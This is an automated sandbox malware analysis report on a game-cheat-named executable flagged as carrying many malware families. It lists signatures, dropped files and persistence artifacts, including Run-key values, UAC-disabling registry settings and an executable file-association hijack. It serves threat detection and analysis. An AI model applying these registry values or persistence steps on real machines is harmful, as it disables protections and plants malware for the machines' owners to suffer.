Malware Analysis Report

2024-09-22 14:44

Sample ID 240109-12gfsaaagr
Target krunker.iohacks.cc
SHA256 892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
Tags
dcrat hawkeye neshta ramnit redline risepro stealc troldesh wannacry zgrat 2024 banker collection discovery evasion infostealer keylogger persistence ransomware rat spyware stealer trojan upx worm cerber maze macro macro_on_action lumma
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

Threat Level: Known bad

The file krunker.iohacks.cc was found to be: Known bad.

Malicious Activity Summary

dcrat hawkeye neshta ramnit redline risepro stealc troldesh wannacry zgrat 2024 banker collection discovery evasion infostealer keylogger persistence ransomware rat spyware stealer trojan upx worm cerber maze macro macro_on_action lumma

Maze

DcRat

HawkEye

Detect ZGRat V1

Lumma Stealer

Process spawned unexpected child process

Detect Neshta payload

ZGRat

RedLine payload

Stealc

RisePro

UAC bypass

Wannacry

Neshta

Ramnit

Modifies WinLogon for persistence

Cerber

RedLine

Troldesh, Shade, Encoder.858

Deletes shadow copies

NirSoft WebBrowserPassView

DCRat payload

NirSoft MailPassView

Nirsoft

Blocklisted process makes network request

Contacts a large (1100) amount of remote hosts

Downloads MZ/PE file

Contacts a large (1143) amount of remote hosts

Disables RegEdit via registry modification

Office macro that triggers on suspicious action

Contacts a large (1132) amount of remote hosts

Drops file in Drivers directory

Disables Task Manager via registry modification

Modifies Windows Firewall

Unexpected DNS network traffic destination

Uses the VBS compiler for execution

Executes dropped EXE

Modifies file permissions

Reads data files stored by FTP clients

Checks computer location settings

Modifies system executable filetype association

Loads dropped DLL

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Drops startup file

.NET Reactor proctector

UPX packed file

Accesses Microsoft Outlook accounts

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Checks whether UAC is enabled

Accesses Microsoft Outlook profiles

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Drops file in System32 directory

Drops autorun.inf file

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Sets desktop wallpaper using registry

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Office loads VBA resources, possible macro or embedded object present

Runs net.exe

Opens file in notepad (likely ransom note)

Enumerates system info in registry

Interacts with shadow copies

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Modifies system certificate store

outlook_office_path

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

System policy modification

Kills process with taskkill

Creates scheduled task(s)

Delays execution with timeout.exe

Script User-Agent

Suspicious use of UnmapMainImage

Suspicious use of FindShellTrayWindow

outlook_win_path

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

Runs ping.exe

Modifies registry key

Suspicious behavior: LoadsDriver

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-01-09 22:08

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-09 22:08

Reported

2024-01-09 22:29

Platform

win7-20231215-en

Max time kernel

565s

Max time network

634s

Command Line

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

HawkEye

keylogger trojan stealer spyware hawkeye

Neshta

persistence spyware neshta

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Ramnit

trojan spyware stealer worm banker ramnit

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

RisePro

stealer risepro

Stealc

stealer stealc

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A

Wannacry

ransomware worm wannacry

ZGRat

rat zgrat

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes shadow copies

ransomware

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Contacts a large (1132) amount of remote hosts

discovery

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe C:\PROGRA~3\system.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD94B6.tmp C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD94CA.tmp C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe C:\PROGRA~3\system.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\Desktop\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp N/A
N/A N/A C:\Users\Admin\Desktop\10.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-URSJ6.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPSP~1.EXE N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe N/A
N/A N/A C:\Users\Admin\Desktop\5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NNBEH.tmp\tuc5.tmp N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\7.exe N/A
N/A N/A C:\Users\Admin\Desktop\8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Windows\SysWOW64\cscript.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "\"C:\\ProgramData\\freebl3\\system.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\enuqrziy120 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6 = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\6.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\Desktop\7.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\a: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\j: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\o: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\s: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\w: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\h: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\m: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\q: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\r: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\z: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\b: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\k: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\n: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\p: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\v: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\y: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\e: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\g: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\i: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\l: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\t: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\u: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\x: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A whatismyipaddress.com N/A N/A

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
